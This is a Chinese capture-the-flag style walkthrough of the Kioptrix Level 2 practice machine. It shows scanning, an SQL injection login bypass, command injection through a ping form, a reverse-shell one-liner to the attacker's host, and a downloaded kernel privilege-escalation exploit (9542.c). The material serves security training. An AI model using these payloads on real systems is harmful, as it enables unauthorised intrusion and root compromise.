当前位置: 首页 > web >正文

OSCP备战-kioptrix level _2详细分析

为什么审核一直不通过啊,这是靶机练习啊,为什么为什么为什么

探测目标IP

arp-scan -l


得出目标IP:192.168.155.164
也可以使用

netdiscover -i eth0 -r 192.168.155.0/24

端口扫描

nmap -sV -sT --min-rate 1000 -p1-65535 IP


结果如下:

└─$ nmap -sV -sT --min-rate 1000  -p1-65535 192.168.155.164
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 20:55 EDT
Nmap scan report for 192.168.155.164
Host is up (0.0034s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
738/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)


80端口

访问一下,开局一个登录框


拿dirsearch 扫一下看看

dirsearch -u http://192.168.155.164 -e *


访问http://192.168.155.164/manual/index.html
apache页面,好像用处不大
回到登录框
端口开启有3306数据库
尝试SQL:
 

admin' or 1=1 #


进入后台,好像又空白了,但是网站嘛,查看源码一下


发现被注释掉的一部分源码
要恢复页面,bp抓返回包,去掉引号再放开,发现页面恢复正常了


网站执行Ping命令,很容易想到代码执行漏洞
试试看:

192.168.155.142;ls


回显显示出结果:index.php、pingit.php

kali开启监听:

nc -lvvp 9001


反弹shell:

192.168.155.142;sh -i >& /dev/tcp/192.168.155.142/9001 0>&1


查看kali,有结果了


查看id,显示:

uid=48(apache) gid=48(apache) groups=48(apache)


普通用户需要提权
查看系统版本:

uname -a


显示:

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux


查看详细的发行版系统版本信息:

cat /etc/*-release


查找版本漏洞:
 

searchsploit linux 2.6 centos 4.5


下载:

searchsploit -m 9542.c 


查看要求:

vim 9542.c 


因为要求将Poc下载到靶机里,我们通过反弹的shell实现
上kali机去开启一下服务:

python -m http.server 80


回到连接靶机,下载脚本:

cd /tmp
wget http://192.168.155.142/9542.c
ls


编译文件:

gcc 9542.c -o exploit
./exploit
whoami


权限是root了,大功告成

 

http://www.xdnf.cn/news/4792.html

相关文章:

  • 11-GBase 8s 事务型数据库 管理员常用命令
  • 10.王道_HTTP
  • 数据中台-数据实施服务常用工具组件-(续)
  • 977.有序数组的平方
  • Kuikly 安装环境篇
  • ESP32-CAM开发板学习(一)
  • Windows环境,Python实现对本机处于监听状态的端口,打印出端口,进程ID,程序名称
  • 静态BFD配置
  • USB集线器芯片革新之战:CH334U如何以工业级性能重新定义HUB控制器
  • Python教程112:找到每月的第三个星期五(calendar)
  • 图表制作-带背景色的柱状图
  • C# NX二次开发:判断两个体是否干涉和获取系统日志的UFUN函数
  • 手撕基于AMQP协议的简易消息队列-3(项目所用到的工具类的编写)
  • DRF+Vue项目线上部署:腾讯云+Centos7.6
  • Android学习总结之kotlin协程面试篇
  • [学习]RTKLib详解:ephemeris.c与rinex.c
  • 77.组合问题
  • 基于Partial Cross Entropy的弱监督语义分割实战指南
  • ElasticSearch基本概念
  • Abaqus学习笔记
  • 解锁 LLM 推理速度:深入 FlashAttention 与 PagedAttention 的原理与实践
  • 如何对 Oracle 日志文件进行校验
  • AUBO STUDIO简介
  • Milvus(17):向量索引、FLAT、IVF_FLAT
  • 在现代Web应用中集成 PDF.js (pdfjs-dist 5.2 ESM): 通过 jsdelivr 实现动态加载与批注功能的思考
  • TDengine 在新能源行业应用
  • Java 线程全面概述
  • 在Excel图表添加辅助线
  • 在 YAFFS2 文件系统中,`yaffs_pread` 函数详解
  • 2.3 点云数据存储格式——LiDAR专用型点云存储格式